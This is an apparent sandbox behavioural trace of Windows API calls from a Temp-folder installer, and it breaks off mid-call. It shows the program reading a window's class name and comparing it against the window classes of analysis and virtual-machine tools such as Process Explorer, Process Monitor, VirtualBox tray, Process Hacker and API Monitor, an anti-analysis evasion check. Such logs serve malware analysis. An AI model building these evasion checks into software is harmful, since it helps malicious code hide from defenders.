[0158.657] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.657] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.657] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.657] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.657] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.658] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.658] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65660") returned 5 [0158.658] lstrcpyA (in: lpString1=0x430400, lpString2="65660" | out: lpString1="65660") returned="65660" [0158.658] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrlenA (lpString="callback1") returned 9 [0158.658] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.658] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.658] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.658] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.658] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.658] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.658] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.659] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.659] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.659] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.659] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.659] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.659] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.659] lstrcpynA (in: lpString1=0x341200, lpString2="65660", iMaxLength=1024 | out: lpString1="65660") returned="65660" [0158.659] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.659] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.659] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.659] GetWindowTextA (in: hWnd=0x1007c, lpString=0x340df8, nMaxCount=1024 | out: lpString="Start") returned 5 [0158.659] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.659] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.660] lstrcpyA (in: lpString1=0x430800, lpString2="Start" | out: lpString1="Start") returned="Start" [0158.660] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65660") returned 5 [0158.660] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.660] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.660] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.660] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.660] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.660] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.660] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.660] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.660] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.661] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.661] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.661] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.661] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.661] lstrcpynA (in: lpString1=0x340df8, lpString2="65660", iMaxLength=1024 | out: lpString1="65660") returned="65660" [0158.661] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.661] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.661] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.661] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Button") returned 6 [0158.661] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.661] lstrcpynA (in: lpString1=0x341200, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrcpyA (in: lpString1=0x430c00, lpString2="Button" | out: lpString1="Button") returned="Button" [0158.661] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65660") returned 5 [0158.661] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.661] lstrlenA (lpString="0") returned 1 [0158.661] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrlenA (lpString="Button") returned 6 [0158.661] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.661] lstrcmpiA (lpString1="Button", lpString2="PROCEXPL") returned -1 [0158.661] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrlenA (lpString="Button") returned 6 [0158.661] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.662] lstrcmpiA (lpString1="Button", lpString2="PROCMON_WINDOW_CLASS") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.662] lstrcmpiA (lpString1="Button", lpString2="VBoxTrayToolWndClass") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.662] lstrcmpiA (lpString1="Button", lpString2="VMSwitchUserControlClass") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.662] lstrcmpiA (lpString1="Button", lpString2="ProcessLasso_Notification_Class") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.662] lstrcmpiA (lpString1="Button", lpString2="SmartSniff") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.662] lstrcmpiA (lpString1="Button", lpString2="ProcessHacker") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.662] lstrcmpiA (lpString1="Button", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.662] lstrcmpiA (lpString1="Button", lpString2="SysAnalyzer") returned -1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrlenA (lpString="Button") returned 6 [0158.663] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.663] lstrcmpiA (lpString1="Button", lpString2="VMSwitchUserControlClass") returned -1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrlenA (lpString="Button") returned 6 [0158.663] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.663] lstrcmpiA (lpString1="Button", lpString2="ProcessHacker") returned -1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrlenA (lpString="Start") returned 5 [0158.663] lstrcpynA (in: lpString1=0x40ac18, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.663] lstrcmpiA (lpString1="Start", lpString2="0") returned 1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrlenA (lpString="Start") returned 5 [0158.663] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.664] lstrlenA (lpString="3399936") returned 7 [0158.664] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.664] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.664] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.664] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.665] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrlenA (lpString="") returned 0 [0158.665] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrlenA (lpString="") returned 0 [0158.665] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrlenA (lpString="") returned 0 [0158.665] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.665] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.665] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.665] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.665] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.665] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.666] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.666] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.666] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.666] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.666] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.666] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.666] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.666] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.666] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.666] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.666] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.666] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.667] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] strstr (_Str="Start", _SubStr="- main thread") returned 0x0 [0158.667] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.667] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.667] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.667] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrlenA (lpString="0") returned 1 [0158.667] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.667] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.667] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.667] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.668] lstrlenA (lpString="0") returned 1 [0158.668] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrlenA (lpString="Start") returned 5 [0158.668] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrlenA (lpString="3399936") returned 7 [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.668] lstrlenA (lpString="") returned 0 [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.668] lstrcpynA (in: 